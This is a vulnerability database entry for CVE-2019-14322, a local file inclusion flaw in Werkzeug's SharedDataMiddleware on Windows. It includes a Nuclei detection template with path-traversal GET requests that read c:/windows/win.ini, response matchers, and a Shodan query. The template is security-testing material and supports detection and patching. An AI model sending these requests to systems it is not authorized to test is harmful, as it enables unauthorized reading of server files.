Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-14322
HistoryJul 31, 2020 - 5:22 p.m.

Pallets Werkzeug <0.15.5 - Local File Inclusion

2020-07-3117:22:10
ProjectDiscovery
github.com
7

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.3 High

AI Score

Confidence

High

0.652 Medium

EPSS

Percentile

97.9%

Pallets Werkzeug before 0.15.5 is susceptible to local file inclusion because SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames.
id: CVE-2019-14322

info:
  name: Pallets Werkzeug <0.15.5 - Local File Inclusion
  author: madrobot
  severity: high
  description: |
    Pallets Werkzeug before 0.15.5 is susceptible to local file inclusion because SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames.
  impact: |
    The LFI vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution.
  remediation: |
    Upgrade Pallets Werkzeug to version 0.15.5 or above to mitigate the LFI vulnerability.
  reference:
    - https://palletsprojects.com/blog/werkzeug-0-15-5-released/
    - http://packetstormsecurity.com/files/163398/Pallets-Werkzeug-0.15.4-Path-Traversal.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-14322
    - https://github.com/faisalfs10x/CVE-2019-14322-scanner
    - https://github.com/sobinge/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-14322
    cwe-id: CWE-22
    epss-score: 0.64382
    epss-percentile: 0.97881
    cpe: cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: microsoft
    product: windows
    shodan-query: cpe:"cpe:2.3:o:microsoft:windows"
  tags: cve,cve2019,lfi,odoo,packetstorm,palletsprojects,microsoft

http:
  - method: GET
    path:
      - "{{BaseURL}}/base_import/static/c:/windows/win.ini"
      - "{{BaseURL}}/web/static/c:/windows/win.ini"
      - "{{BaseURL}}/base/static/c:/windows/win.ini"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100cf31c1f9d536390e8983106a7ca1390528768324bec411d8a5b8353dcfe48e56022100989b456e58db370475bec4f6d88e1a9efda788bb46312f58a18cc779d083ccb7:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.3 High

AI Score

Confidence

High

0.652 Medium

EPSS

Percentile

97.9%